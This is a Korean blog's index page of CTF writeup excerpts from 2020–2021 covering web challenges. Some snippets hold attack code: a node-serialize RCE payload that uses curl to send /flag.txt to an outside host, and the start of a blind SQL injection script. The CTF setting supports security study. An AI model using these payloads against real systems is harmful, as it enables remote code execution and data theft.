'ctf writeup' 카테고리의 글 목록 (3 Page)

IJCTF 2021 Memory

https://gist.github.com/as3617/fa06307b5c1bcc002e3b646bfcc3500d exploit code IJCTF 2021 - memory writeup IJCTF 2021 - memory writeup. GitHub Gist: instantly share code, notes, and snippets. gist.github.com disabled_functions are except putenv, mail clean_up option for session is off When the UPLOAD_PROGRESS meets clean_up option as off that session file will have the path for the uploaded file. ..

ctf writeup · 2021. 7. 25. 20:33

0CTF/TCTF 2021 Quals - 1linephp [web]

Description http://111.186.59.2:50080 http://111.186.59.2:50081 http://111.186.59.2:50082 The three servers are the same, you can choose any one. server will be reset every 10 minutes. this chall is almost same https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html.

ctf writeup · 2021. 7. 5. 13:07

zh3r0 CTF v2 Web writeup

Only Exploit Code.. sparta - node-serialize rce # https://www.exploit-db.com/exploits/49552 import requests import re import base64 import sys url = 'http://web.zh3r0.cf:6666/guest' # change this payload = """function(){require('child_process').exec('curl -F file1=@/flag.txt server:1234',function(error, stdout, stderr){return stdout;});}()""" # rce = "_$$ND_FUNC$$_process.exit(0)" # code ="_$$ND..

ctf writeup · 2021. 6. 6. 20:21

m0leCon 2021 Teaser Writeup

Team Alpray

ctf writeup · 2021. 5. 18. 21:28

DarkCON ctf web writeup - VKL_SQL

1. SQL injection 2. file upload -> rcesql_exploit.py import requests import string import time url = 'http://vkl-sql.darkarmy.xyz/login.php' table_name = '' strings = 'abcdefghijklmnopqrstuvwxyzABCDEFGHJIJKLMNOPQRSTUVWXYZ1234567890{}' for i in range(1,80): for j in strings: #data = {'username':'admin" and if(ascii(substr((select schema_name from information_sc..

ctf writeup · 2021. 2. 21. 21:25

justCTF 2020 Web writeup

아는 형들이랑 Alpray팀으로 같이 했는데 1등했다. BabyCSP We could see a source code by visiting main page.

ctf writeup · 2021. 2. 5. 00:29

Layer7 CTF 2020 writeup

LAYER7 CTF Writeup - as3617 mic check - MISC (100pts) 개발자도구로 description 영역을 확인해보면 플래그가 있다. FLAG : LAYER7{SunriNIN73rN3thIGHScHOO1layEr7} zipzipzipzipzip - MISC (100pts) 압축파일을 열어보면 안에 또 압축파일이 있는데 손으로 하기 귀찮아서 shell script로 빠르게 풀었다. while [ "`find . -type f -name '*.zip' | wc -l`" -gt 0 ] do find . -type f -name "*.zip" -exec unzip -- '{}' \; -exec rm -- '{}' \; done 압축파일이 있는 폴더로 가서 위의 스크립트를 실행하면 ..

ctf writeup · 2020. 11. 15. 00:10

사이버작전경연대회 2020 본선 - [Web] PMS writeup

보호되어 있는 글입니다.

ctf writeup · 2020. 10. 19. 00:09